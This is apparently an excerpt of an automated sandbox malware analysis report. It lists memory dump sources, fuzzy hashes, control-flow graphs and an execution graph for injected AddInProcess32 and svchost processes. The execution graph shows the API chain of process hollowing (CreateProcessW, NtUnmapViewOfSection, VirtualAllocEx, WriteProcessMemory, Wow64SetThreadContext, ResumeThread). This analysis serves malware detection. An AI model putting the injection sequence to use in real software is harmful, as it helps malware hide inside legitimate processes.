                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 8c7cea09fe558acc5d3e42b34947f3b69628e8eff294482518d48e34174934d2
                                                                          • Instruction ID: f085c2d302cdcc8ecfd9f09d485eaf8716393ec5bec310a264dad28a09ec6267
                                                                          • Opcode Fuzzy Hash: 8c7cea09fe558acc5d3e42b34947f3b69628e8eff294482518d48e34174934d2
                                                                          • Instruction Fuzzy Hash: 421133B1C0061A9BCB14CF9AD544B9EFBF4BF48320F10816AD858B7250D738A940CFE5
                                                                          Function 00F0D044 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2870362953.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_f0d000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 43e50882f26858171f3b7aca02a335ed3a1d19f213f827e77c0b67106b1678df
                                                                          • Instruction ID: a624a08e2741ab15b24ca3ac0e61bd1e39c9dbe70ded839e1445ebc3cb4aec36
                                                                          • Opcode Fuzzy Hash: 43e50882f26858171f3b7aca02a335ed3a1d19f213f827e77c0b67106b1678df
                                                                          • Instruction Fuzzy Hash: 89213471A04204DFDB10DF64C9C4B26BBA5FB84324F20C56DE84D4B29AC73AD846FA62
                                                                          Function 00F0D03F Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2870362953.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_f0d000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                          • Instruction ID: bd3435334727746df6a7455efe7994d2d12001f3c094d6bb449bf4a3617dd8a8
                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                          • Instruction Fuzzy Hash: 3711D075904244CFDB11CF50D9C4B15BF62FB44324F24C6A9D8494B696C33AD84AEF51

                                                                          Execution Graph

                                                                          Execution Coverage:12.1%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:12%
                                                                          Total number of Nodes:25
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 11357 7ffd9b8d1509 11359 7ffd9b8d1515 CreateProcessW 11357->11359 11360 7ffd9b8d175a 11359->11360 11361 7ffd9b8d188a 11362 7ffd9b8d1897 NtUnmapViewOfSection 11361->11362 11364 7ffd9b8d1989 11362->11364 11365 7ffd9b8d282a 11366 7ffd9b8d280a 11365->11366 11366->11365 11367 7ffd9b8d28af ResumeThread 11366->11367 11368 7ffd9b8d2915 11367->11368 11369 7ffd9b8b47a6 11370 7ffd9b8b47d1 VirtualProtect 11369->11370 11372 7ffd9b8b4908 11370->11372 11345 7ffd9b8d2275 11346 7ffd9b8d2283 Wow64SetThreadContext 11345->11346 11348 7ffd9b8d2369 11346->11348 11377 7ffd9b8d1c58 11378 7ffd9b8d1c69 VirtualAllocEx 11377->11378 11380 7ffd9b8d1d94 11378->11380 11353 7ffd9b8b0a0d 11354 7ffd9b8b0a1b FreeConsole 11353->11354 11356 7ffd9b8b0ae1 11354->11356 11373 7ffd9b8d1f1d 11374 7ffd9b8d1f87 WriteProcessMemory 11373->11374 11376 7ffd9b8d2076 11374->11376

                                                                          Executed Functions

                                                                          Function 00007FFD9B8BF3A3 Relevance: 2.0, Strings: 1, Instructions: 773COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 554 7ffd9b8bf3a3-7ffd9b8bf3c8 555 7ffd9b8bf3cb-7ffd9b8bf3fc 554->555 556 7ffd9b8bf3ca 554->556 558 7ffd9b8bf446-7ffd9b8bf469 555->558 559 7ffd9b8bf3fe-7ffd9b8bf42f 555->559 556->555 573 7ffd9b8bf9da-7ffd9b8bf9e3 558->573 562 7ffd9b8bf46e-7ffd9b8bf47e 559->562 563 7ffd9b8bf431-7ffd9b8bf444 559->563 567 7ffd9b8bf83c-7ffd9b8bf842 562->567 568 7ffd9b8bf484-7ffd9b8bf499 562->568 563->558 571 7ffd9b8bf855-7ffd9b8bf860 567->571 572 7ffd9b8bf844-7ffd9b8bf854 567->572 568->567 575 7ffd9b8bf862-7ffd9b8bf869 571->575 576 7ffd9b8bf891-7ffd9b8bf897 571->576 572->571 577 7ffd9b8bf9e9-7ffd9b8bf9ea 573->577 578 7ffd9b8bf86b-7ffd9b8bf86e 575->578 579 7ffd9b8bf8c2 575->579 580 7ffd9b8bf8aa-7ffd9b8bf8b5 576->580 581 7ffd9b8bf899-7ffd9b8bf8a9 576->581 582 7ffd9b8bf9ec-7ffd9b8bf9f6 577->582 583 7ffd9b8bf870-7ffd9b8bf873 578->583 584 7ffd9b8bf8ef-7ffd9b8bf8f1 578->584 586 7ffd9b8bf93e-7ffd9b8bf941 579->586 587 7ffd9b8bf8c3 579->587 599 7ffd9b8bf8b7-7ffd9b8bf8be 580->599 600 7ffd9b8bf903-7ffd9b8bf909 580->600 581->580 589 7ffd9b8bf96d-7ffd9b8bf970 584->589 590 7ffd9b8bf8f2 584->590 592 7ffd9b8bf944-7ffd9b8bf962 586->592 587->592 593 7ffd9b8bf8c4 587->593 589->573 597 7ffd9b8bf963-7ffd9b8bf964 590->597 598 7ffd9b8bf8f3-7ffd9b8bf8f9 590->598 592->597 594 7ffd9b8bf8c8-7ffd9b8bf8ec 593->594 595 7ffd9b8bf8c5-7ffd9b8bf8c7 593->595 594->584 595->594 610 7ffd9b8bf9d5 597->610 611 7ffd9b8bf965-7ffd9b8bf96b 597->611 603 7ffd9b8bf8fb-7ffd9b8bf8fe 598->603 604 7ffd9b8bf97a-7ffd9b8bf987 598->604 607 7ffd9b8bf917-7ffd9b8bf91b 599->607 608 7ffd9b8bf8c0 599->608 605 7ffd9b8bf91c-7ffd9b8bf927 600->605 606 7ffd9b8bf90b-7ffd9b8bf914 600->606 603->573 619 7ffd9b8bf9b8-7ffd9b8bf9bf 604->619 620 7ffd9b8bf989-7ffd9b8bf990 604->620 621 7ffd9b8bf929-7ffd9b8bf930 605->621 622 7ffd9b8bf972-7ffd9b8bf979 605->622 606->607 607->605 608->579 613 7ffd9b8bf9d7-7ffd9b8bf9d8 610->613 614 7ffd9b8bfa56-7ffd9b8bfa5c 610->614 611->582 611->589 613->573 617 7ffd9b8bfaa6-7ffd9b8bfae3 call 7ffd9b8bc5f0 call 7ffd9b8be750 614->617 618 7ffd9b8bfa5e-7ffd9b8bfa78 614->618 652 7ffd9b8bfae5-7ffd9b8bfaeb 617->652 653 7ffd9b8bfb5d-7ffd9b8bfb7a 617->653 626 7ffd9b8bfa79-7ffd9b8bfa89 618->626 624 7ffd9b8bfa18-7ffd9b8bfa2d 619->624 625 7ffd9b8bf9c1-7ffd9b8bf9d3 619->625 620->577 628 7ffd9b8bf992-7ffd9b8bf995 620->628 621->620 623 7ffd9b8bf932-7ffd9b8bf935 621->623 622->604 631 7ffd9b8bf937-7ffd9b8bf93c 623->631 632 7ffd9b8bf9b6 623->632 640 7ffd9b8bfa35 624->640 641 7ffd9b8bfa2f 624->641 625->610 634 7ffd9b8bfcb5-7ffd9b8bfcc1 626->634 635 7ffd9b8bfa8a-7ffd9b8bfaa2 626->635 629 7ffd9b8bf997-7ffd9b8bf99a 628->629 630 7ffd9b8bfa16-7ffd9b8bfa17 628->630 630->624 631->586 631->631 632->573 647 7ffd9b8bfcc9 634->647 648 7ffd9b8bfcc3 634->648 635->617 642 7ffd9b8bfa37 640->642 643 7ffd9b8bfa39-7ffd9b8bfa55 640->643 641->640 642->626 642->643 643->614 650 7ffd9b8bfccb 647->650 651 7ffd9b8bfccd-7ffd9b8bfcfe 647->651 648->647 650->651 654 7ffd9b8bfd0d-7ffd9b8bfd13 650->654 673 7ffd9b8bfcff-7ffd9b8bfd03 651->673 657 7ffd9b8bfb07-7ffd9b8bfb58 652->657 658 7ffd9b8bfaed-7ffd9b8bfafa 652->658 660 7ffd9b8bfb7c-7ffd9b8bfb82 653->660 661 7ffd9b8bfbf4-7ffd9b8bfc02 653->661 670 7ffd9b8bfd16 654->670 678 7ffd9b8bfc86-7ffd9b8bfc8e 657->678 658->657 663 7ffd9b8bfafc-7ffd9b8bfb05 658->663 667 7ffd9b8bfb9e-7ffd9b8bfbef 660->667 668 7ffd9b8bfb84-7ffd9b8bfb91 660->668 674 7ffd9b8bfc44-7ffd9b8bfc67 661->674 675 7ffd9b8bfc04-7ffd9b8bfc11 661->675 663->657 667->678 668->667 680 7ffd9b8bfb93-7ffd9b8bfb9c 668->680 676 7ffd9b8bfd17-7ffd9b8bfd80 670->676 673->676 677 7ffd9b8bfd05-7ffd9b8bfd0c 673->677 702 7ffd9b8bfc69-7ffd9b8bfc73 674->702 675->678 679 7ffd9b8bfc13-7ffd9b8bfc19 675->679 710 7ffd9b8bfd87-7ffd9b8bfd8b 676->710 677->654 678->673 682 7ffd9b8bfc90-7ffd9b8bfc95 678->682 683 7ffd9b8bfc35-7ffd9b8bfc41 679->683 684 7ffd9b8bfc1b-7ffd9b8bfc28 679->684 680->667 682->670 689 7ffd9b8bfc97-7ffd9b8bfcb4 682->689 683->674 684->683 695 7ffd9b8bfc2a-7ffd9b8bfc33 684->695 695->683 706 7ffd9b8bfc7a-7ffd9b8bfc82 702->706 706->678 711 7ffd9b8bfd92-7ffd9b8bfdad 710->711
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (V_H
                                                                          • API String ID: 0-1775731446
                                                                          • Opcode ID: 8e0897a3649fc580fb5a52fece19df82357b904f3a637ce6b9f3da69041d757e
                                                                          • Instruction ID: 975e24c6f7593ddbf79fda2872c3442119fcee667b548f5d550b47c45d581ea9
                                                                          • Opcode Fuzzy Hash: 8e0897a3649fc580fb5a52fece19df82357b904f3a637ce6b9f3da69041d757e
                                                                          • Instruction Fuzzy Hash: 45325631F0EAAE0FE7A99B78487557477D1EF99300B0501BED48AC71E3ED18A9468BC1
                                                                          Function 00007FFD9B8D188A Relevance: 1.7, APIs: 1, Instructions: 151nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 892 7ffd9b8d188a-7ffd9b8d1987 NtUnmapViewOfSection 896 7ffd9b8d1989 892->896 897 7ffd9b8d198f-7ffd9b8d19cf 892->897 896->897
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: SectionUnmapView
                                                                          • String ID:
                                                                          • API String ID: 498011366-0
                                                                          • Opcode ID: e22fd87633089214f8a00c6f07e4e8f18fd988413d94fc030998b6dc121255cd
                                                                          • Instruction ID: d329ba8e68dd230291d6e45783d7cc419e7a9087678e87e596a2c090bd19fea3
                                                                          • Opcode Fuzzy Hash: e22fd87633089214f8a00c6f07e4e8f18fd988413d94fc030998b6dc121255cd
                                                                          • Instruction Fuzzy Hash: D8413B70A0864C8FDB94DF98D845BADBBF1FF9A310F1042AAD049D7256DB70A985CF41
                                                                          Function 00007FFD9B8BD511 Relevance: 1.4, Instructions: 1423COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5c59d71d1577ccbf441cf1ec3c955a95ac1a75d3fc04302bfb98ca70d0634029
                                                                          • Instruction ID: cb1a209a17c3a6098de255c63468c145cd149760bc98dafac48fea64c002a940
                                                                          • Opcode Fuzzy Hash: 5c59d71d1577ccbf441cf1ec3c955a95ac1a75d3fc04302bfb98ca70d0634029
                                                                          • Instruction Fuzzy Hash: CAA2683061DB5A4FE769DB38C4A44B5B7E1FF89301B0545BED48AC72A2DE34E946CB80
                                                                          Function 00007FFD9B8C0658 Relevance: 1.1, Instructions: 1110COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c156393e80f07f2673d2c7b56dd209f10b3f2807f91669fe028ebd3d2abdc78
                                                                          • Instruction ID: 1d706852b9f8c55f9d8e38d6a20a20874d12565e1eccb2b6d879857b67adcfec
                                                                          • Opcode Fuzzy Hash: 6c156393e80f07f2673d2c7b56dd209f10b3f2807f91669fe028ebd3d2abdc78
                                                                          • Instruction Fuzzy Hash: B372787061DB4D4FD769EB28C4A04B577E1FF89300B0546BEE48AC72A6DE34E946CB81
                                                                          Function 00007FFD9B8BD130 Relevance: .4, Instructions: 440COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 105abb2b45f5c3490e0c87948794ad71991103d366e99b264f81a61fb8ab7c5f
                                                                          • Instruction ID: 8333431bd690e5ba1b107b481581d7af2f42f6572c29d42dc60e912e5f82e723
                                                                          • Opcode Fuzzy Hash: 105abb2b45f5c3490e0c87948794ad71991103d366e99b264f81a61fb8ab7c5f
                                                                          • Instruction Fuzzy Hash: 18D18C3160DB9A4FE32DCB3884A11B5B7E1FFD9301B05467EE4C6C72A1DA24E546CB81
                                                                          Function 00007FFD9B8C6478 Relevance: .2, Instructions: 151COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d91cd5f0255071c45e86ac349d7c2c1d227f8c14d00753eb74ef919a11718e4
                                                                          • Instruction ID: 0214164435ad8343cea8d1b5c1f50a045f2a15c75ec9f0e1d8d93c78361ea34f
                                                                          • Opcode Fuzzy Hash: 6d91cd5f0255071c45e86ac349d7c2c1d227f8c14d00753eb74ef919a11718e4
                                                                          • Instruction Fuzzy Hash: 3941777160D7890FC31E9B7488211B27BA1EB57310B1682BFD487CB1E7EC28AD468392
                                                                          Function 00007FFD9B98026B Relevance: 2.3, Strings: 1, Instructions: 1085COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 281 7ffd9b98026b-7ffd9b98026d 282 7ffd9b9803b1-7ffd9b9803b7 281->282 283 7ffd9b98026e-7ffd9b98027c 281->283 288 7ffd9b9803b9-7ffd9b9803c8 282->288 285 7ffd9b980284-7ffd9b980286 283->285 286 7ffd9b980288-7ffd9b980289 285->286 287 7ffd9b9802f7-7ffd9b980306 285->287 289 7ffd9b98024f-7ffd9b980255 286->289 290 7ffd9b98028b 286->290 291 7ffd9b980307-7ffd9b980309 287->291 292 7ffd9b9803c9-7ffd9b9803e2 288->292 294 7ffd9b9801f2-7ffd9b980222 289->294 295 7ffd9b980257-7ffd9b98026a 289->295 290->291 293 7ffd9b98028d 290->293 291->282 296 7ffd9b98030a-7ffd9b980348 291->296 297 7ffd9b980434-7ffd9b980440 292->297 298 7ffd9b9803e5-7ffd9b980427 292->298 299 7ffd9b9802d4 293->299 300 7ffd9b98028f-7ffd9b9802a0 293->300 294->282 303 7ffd9b980228-7ffd9b980231 294->303 295->281 296->288 328 7ffd9b98034a-7ffd9b98034d 296->328 301 7ffd9b980442-7ffd9b98045a 297->301 302 7ffd9b9804b1-7ffd9b9804d0 297->302 320 7ffd9b98045c-7ffd9b980474 298->320 321 7ffd9b980429-7ffd9b980430 298->321 299->282 310 7ffd9b9802da-7ffd9b9802f5 299->310 309 7ffd9b980233-7ffd9b98023b 300->309 314 7ffd9b9802a2-7ffd9b9802b8 300->314 311 7ffd9b9804d1-7ffd9b9804e7 301->311 301->320 302->311 303->309 309->282 316 7ffd9b98023c-7ffd9b98024e 309->316 310->287 326 7ffd9b98051c-7ffd9b980534 311->326 327 7ffd9b9804e9-7ffd9b980500 311->327 314->282 322 7ffd9b9802be-7ffd9b9802d1 314->322 316->289 321->297 322->299 330 7ffd9b980502-7ffd9b98051a 327->330 331 7ffd9b980571-7ffd9b980590 327->331 328->292 332 7ffd9b98034f 328->332 330->326 333 7ffd9b980592-7ffd9b980595 331->333 334 7ffd9b980597-7ffd9b9805a7 331->334 337 7ffd9b980351-7ffd9b98035f 332->337 338 7ffd9b980396-7ffd9b9803b0 332->338 333->334 342 7ffd9b9805dc-7ffd9b9805f4 334->342 343 7ffd9b9805a9-7ffd9b9805c0 334->343 337->338 344 7ffd9b9805c2-7ffd9b9805da 343->344 345 7ffd9b980631-7ffd9b980668 343->345 344->342 351 7ffd9b98069d-7ffd9b9806a8 345->351 352 7ffd9b98066a-7ffd9b98067a 345->352 358 7ffd9b9806bc-7ffd9b9806c5 351->358 359 7ffd9b9806aa-7ffd9b9806b9 351->359 353 7ffd9b98067c-7ffd9b98067e 352->353 354 7ffd9b9806eb 352->354 356 7ffd9b980680 353->356 357 7ffd9b9806fa-7ffd9b98073a 353->357 360 7ffd9b9806ed-7ffd9b9806f9 354->360 361 7ffd9b98073c 354->361 364 7ffd9b980682-7ffd9b98069c 356->364 365 7ffd9b9806c6-7ffd9b9806c7 356->365 357->361 358->365 359->358 360->357 362 7ffd9b98073e 361->362 363 7ffd9b980786-7ffd9b98078b 361->363 370 7ffd9b980742-7ffd9b980772 362->370 372 7ffd9b980a42-7ffd9b980a56 363->372 373 7ffd9b98078c-7ffd9b98079e 363->373 364->351 370->372 374 7ffd9b980778-7ffd9b980781 370->374 381 7ffd9b980a57-7ffd9b980ab7 372->381 375 7ffd9b98079f-7ffd9b9807a3 373->375 376 7ffd9b980783-7ffd9b980785 374->376 377 7ffd9b9807a6-7ffd9b9807bd 375->377 378 7ffd9b9807a5 375->378 376->363 377->372 382 7ffd9b9807c3-7ffd9b9807d6 377->382 378->370 378->377 385 7ffd9b980aec-7ffd9b980b04 381->385 386 7ffd9b980ab9-7ffd9b980ad0 381->386 391 7ffd9b9807d8-7ffd9b9807d9 382->391 392 7ffd9b980847-7ffd9b980856 382->392 389 7ffd9b980b41-7ffd9b980b77 385->389 388 7ffd9b980ad2-7ffd9b980aeb 386->388 386->389 388->385 399 7ffd9b980bac-7ffd9b980bc4 389->399 400 7ffd9b980b79-7ffd9b980b90 389->400 391->375 393 7ffd9b9807db 391->393 396 7ffd9b980857-7ffd9b980859 392->396 393->396 397 7ffd9b9807dd 393->397 396->372 401 7ffd9b98085a-7ffd9b980872 396->401 402 7ffd9b980824 397->402 403 7ffd9b9807df-7ffd9b9807f0 397->403 404 7ffd9b980b92-7ffd9b980bab 400->404 405 7ffd9b980c01-7ffd9b980c50 400->405 416 7ffd9b980874-7ffd9b980877 401->416 417 7ffd9b9808e3-7ffd9b9808f0 401->417 402->372 410 7ffd9b98082a-7ffd9b980845 402->410 403->376 412 7ffd9b9807f2-7ffd9b980808 403->412 404->399 426 7ffd9b980c52-7ffd9b980c84 405->426 427 7ffd9b980cc1-7ffd9b980cfe 405->427 410->392 412->372 418 7ffd9b98080e-7ffd9b980821 412->418 421 7ffd9b9808f3 416->421 422 7ffd9b980879 416->422 417->421 418->402 421->372 425 7ffd9b9808f9-7ffd9b98090c 421->425 423 7ffd9b9808c0 422->423 424 7ffd9b98087b-7ffd9b9808a2 422->424 430 7ffd9b9808c3-7ffd9b9808e1 423->430 431 7ffd9b9808c2 423->431 424->372 434 7ffd9b9808a8-7ffd9b9808be 424->434 439 7ffd9b98090e-7ffd9b980912 425->439 440 7ffd9b98097d-7ffd9b980990 425->440 430->417 431->430 434->372 434->423 441 7ffd9b980993 439->441 443 7ffd9b980914 439->443 440->441 441->372 444 7ffd9b980999-7ffd9b9809b5 441->444 445 7ffd9b980974-7ffd9b98097b 443->445 448 7ffd9b9809d2-7ffd9b9809e6 444->448 449 7ffd9b9809b7-7ffd9b9809cc 444->449 445->440 448->381 450 7ffd9b9809e8-7ffd9b9809ed 448->450 449->448 450->445 452 7ffd9b9809ef 450->452 452->372
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1994756231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b980000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: 45ad662eb4f608ebaa577da2cfcedeb3b6fae8d31cbc3297cb8ac22ef565d512
                                                                          • Instruction ID: 8c6c3cafff8191e3cc9e980fe5d15f20843464fb4c23014d1f932383282a67e9
                                                                          • Opcode Fuzzy Hash: 45ad662eb4f608ebaa577da2cfcedeb3b6fae8d31cbc3297cb8ac22ef565d512
                                                                          • Instruction Fuzzy Hash: 75725A72A1EBC94FEB65CB6888655A87FE0FF55700F0A05FED089CB0A3DA346946C741
                                                                          Function 00007FFD9B8D14C5 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 713 7ffd9b8d14c5-7ffd9b8d14d1 714 7ffd9b8d14d5-7ffd9b8d14ee 713->714 715 7ffd9b8d14d3 713->715 717 7ffd9b8d14f4-7ffd9b8d14f8 714->717 718 7ffd9b8d14f0-7ffd9b8d14f2 714->718 715->714 716 7ffd9b8d1515-7ffd9b8d15c2 715->716 722 7ffd9b8d15c4-7ffd9b8d15db 716->722 723 7ffd9b8d15de-7ffd9b8d15ee 716->723 719 7ffd9b8d14ff-7ffd9b8d1504 717->719 718->719 719->716 722->723 724 7ffd9b8d160a-7ffd9b8d165d 723->724 725 7ffd9b8d15f0-7ffd9b8d1607 723->725 726 7ffd9b8d1685-7ffd9b8d1758 CreateProcessW 724->726 727 7ffd9b8d165f-7ffd9b8d167f 724->727 725->724 728 7ffd9b8d175a 726->728 729 7ffd9b8d1760-7ffd9b8d17d2 726->729 727->726 728->729
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4ecc3033f7c0d3cff7a6536c835f3b63959edadec2bdf617e4e1d96f28114aa
                                                                          • Instruction ID: b357e20bed4db4b1bd956d436012917fbc39c77a4789a5daf402fa28ec6aaf82
                                                                          • Opcode Fuzzy Hash: a4ecc3033f7c0d3cff7a6536c835f3b63959edadec2bdf617e4e1d96f28114aa
                                                                          • Instruction Fuzzy Hash: CAA10570A08A1C8FDB98DF58C854BA9BBF1FB69311F1011AED44EE3291DB759985CF40
                                                                          Function 00007FFD9B8D1509 Relevance: 1.8, APIs: 1, Instructions: 305processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 731 7ffd9b8d1509-7ffd9b8d15c2 735 7ffd9b8d15c4-7ffd9b8d15db 731->735 736 7ffd9b8d15de-7ffd9b8d15ee 731->736 735->736 737 7ffd9b8d160a-7ffd9b8d165d 736->737 738 7ffd9b8d15f0-7ffd9b8d1607 736->738 739 7ffd9b8d1685-7ffd9b8d1758 CreateProcessW 737->739 740 7ffd9b8d165f-7ffd9b8d167f 737->740 738->737 741 7ffd9b8d175a 739->741 742 7ffd9b8d1760-7ffd9b8d17d2 739->742 740->739 741->742
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: c8b6ea07d181cac486f96b8700378542d3ed15e95af35511cb9ddc3426fd1027
                                                                          • Instruction ID: 73d2754adb30569fdf57e51bc7200fbe97198eab98298cfdbe3202a4e5d3c266
                                                                          • Opcode Fuzzy Hash: c8b6ea07d181cac486f96b8700378542d3ed15e95af35511cb9ddc3426fd1027
                                                                          • Instruction Fuzzy Hash: 09910270908A1C8FDB98DF58C894BA9BBF1FB69311F1001AED04EE32A1CB759984CF44
                                                                          Function 00007FFD9B8D1B8F Relevance: 1.8, APIs: 1, Instructions: 289COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e562446976ba51c34d08d696516e5e50a2145bab7cc88baa3638f79cf540818
                                                                          • Instruction ID: 5a0a344514c1d8536e8a6fe2c552abd933e9f8cff9267ea5fa89eb9c559fd7e9
                                                                          • Opcode Fuzzy Hash: 5e562446976ba51c34d08d696516e5e50a2145bab7cc88baa3638f79cf540818
                                                                          • Instruction Fuzzy Hash: 2291AE70A0964D8FDBA8EF68C855BE9BBF0FF59310F1002AED44DD7251DA35A985CB80
                                                                          Function 00007FFD9B8D1AFD Relevance: 1.8, APIs: 1, Instructions: 265COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 767 7ffd9b8d1afd-7ffd9b8d1b29 769 7ffd9b8d1b2b-7ffd9b8d1b56 767->769 770 7ffd9b8d1b73-7ffd9b8d1b8b 767->770 771 7ffd9b8d1b5c-7ffd9b8d1b6f 769->771 772 7ffd9b8d1c34-7ffd9b8d1ccf 769->772 770->772 771->770 781 7ffd9b8d1cda-7ffd9b8d1d92 VirtualAllocEx 772->781 782 7ffd9b8d1d9a-7ffd9b8d1df2 781->782 783 7ffd9b8d1d94 781->783 783->782
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8ca000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32ccfb5942e8386e0f16c45a17dce13e49648dcf87e6401b673cabce9332648b
                                                                          • Instruction ID: 2ec50b16231c124be2455551706238239f7e78f4ec57c0a445562d1deb991729
                                                                          • Opcode Fuzzy Hash: 32ccfb5942e8386e0f16c45a17dce13e49648dcf87e6401b673cabce9332648b
                                                                          • Instruction Fuzzy Hash: 9881B030A0DA4C8FDB98DF68C854BE9BBF1FB69314F0042AED04DD3252DA70A985CB41
